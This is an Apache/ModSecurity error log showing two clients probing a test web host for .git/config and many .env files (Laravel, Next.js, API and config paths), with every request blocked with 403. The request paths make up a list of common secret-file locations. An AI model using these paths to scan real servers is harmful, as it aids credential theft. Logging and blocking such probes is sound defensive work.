[Fri Oct 03 22:44:59.923943 2025] [:error] [pid 3205792] [client 195.178.110.223:56544] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOA1y4mFdmNKRZSApKK8bgAAABY"]
[Fri Oct 03 22:44:59.924201 2025] [:error] [pid 3205792] [client 195.178.110.223:56544] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOA1y4mFdmNKRZSApKK8bgAAABY"]
[Fri Oct 03 22:44:59.924381 2025] [:error] [pid 3205792] [client 195.178.110.223:56544] [client 195.178.110.223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOA1y4mFdmNKRZSApKK8bgAAABY"]
[Sat Oct 04 03:54:21.092210 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOB-TRRnn7xrNGxYbuY-iQAAAAM"]
[Sat Oct 04 03:54:21.092420 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOB-TRRnn7xrNGxYbuY-iQAAAAM"]
[Sat Oct 04 03:54:21.092587 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aOB-TRRnn7xrNGxYbuY-iQAAAAM"]
[Sat Oct 04 03:54:21.201558 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aOB-TRRnn7xrNGxYbuY-igAAAAM"]
[Sat Oct 04 03:54:21.201800 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aOB-TRRnn7xrNGxYbuY-igAAAAM"]
[Sat Oct 04 03:54:21.201966 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aOB-TRRnn7xrNGxYbuY-igAAAAM"]
[Sat Oct 04 03:54:21.338034 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aOB-TRRnn7xrNGxYbuY-iwAAAAM"]
[Sat Oct 04 03:54:21.338248 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aOB-TRRnn7xrNGxYbuY-iwAAAAM"]
[Sat Oct 04 03:54:21.338460 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aOB-TRRnn7xrNGxYbuY-iwAAAAM"]
[Sat Oct 04 03:54:22.649789 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aOB-ThRnn7xrNGxYbuY-jQAAAAM"]
[Sat Oct 04 03:54:22.649995 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aOB-ThRnn7xrNGxYbuY-jQAAAAM"]
[Sat Oct 04 03:54:22.650162 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aOB-ThRnn7xrNGxYbuY-jQAAAAM"]
[Sat Oct 04 03:54:22.765054 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOB-ThRnn7xrNGxYbuY-jgAAAAM"]
[Sat Oct 04 03:54:22.765271 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOB-ThRnn7xrNGxYbuY-jgAAAAM"]
[Sat Oct 04 03:54:22.765451 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aOB-ThRnn7xrNGxYbuY-jgAAAAM"]
[Sat Oct 04 03:54:22.907084 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aOB-ThRnn7xrNGxYbuY-jwAAAAM"]
[Sat Oct 04 03:54:22.907316 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aOB-ThRnn7xrNGxYbuY-jwAAAAM"]
[Sat Oct 04 03:54:22.907493 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aOB-ThRnn7xrNGxYbuY-jwAAAAM"]
[Sat Oct 04 03:54:23.018333 2025] [authz_core:error] [pid 3217773] [client 52.55.215.246:51462] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sat Oct 04 03:54:23.135524 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOB-TxRnn7xrNGxYbuY-kQAAAAM"]
[Sat Oct 04 03:54:23.135768 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOB-TxRnn7xrNGxYbuY-kQAAAAM"]
[Sat Oct 04 03:54:23.135970 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aOB-TxRnn7xrNGxYbuY-kQAAAAM"]
[Sat Oct 04 03:54:23.244112 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOB-TxRnn7xrNGxYbuY-kgAAAAM"]
[Sat Oct 04 03:54:23.244316 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOB-TxRnn7xrNGxYbuY-kgAAAAM"]
[Sat Oct 04 03:54:23.244510 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aOB-TxRnn7xrNGxYbuY-kgAAAAM"]
[Sat Oct 04 03:54:24.401564 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lAAAAAM"]
[Sat Oct 04 03:54:24.401799 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lAAAAAM"]
[Sat Oct 04 03:54:24.401964 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lAAAAAM"]
[Sat Oct 04 03:54:24.511377 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lQAAAAM"]
[Sat Oct 04 03:54:24.511584 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lQAAAAM"]
[Sat Oct 04 03:54:24.511790 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lQAAAAM"]
[Sat Oct 04 03:54:24.634610 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lgAAAAM"]
[Sat Oct 04 03:54:24.634827 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lgAAAAM"]
[Sat Oct 04 03:54:24.635025 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lgAAAAM"]
[Sat Oct 04 03:54:24.743778 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lwAAAAM"]
[Sat Oct 04 03:54:24.743974 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lwAAAAM"]
[Sat Oct 04 03:54:24.744139 2025] [:error] [pid 3217773] [client 52.55.215.246:51462] [client 52.55.215.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aOB-UBRnn7xrNGxYbuY-lwAAAAM"]
[Sat Oct 04 03:54:24.915016 2025] [authz_core:error] [pid 3217773] [client 52.55.215.246:51462] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
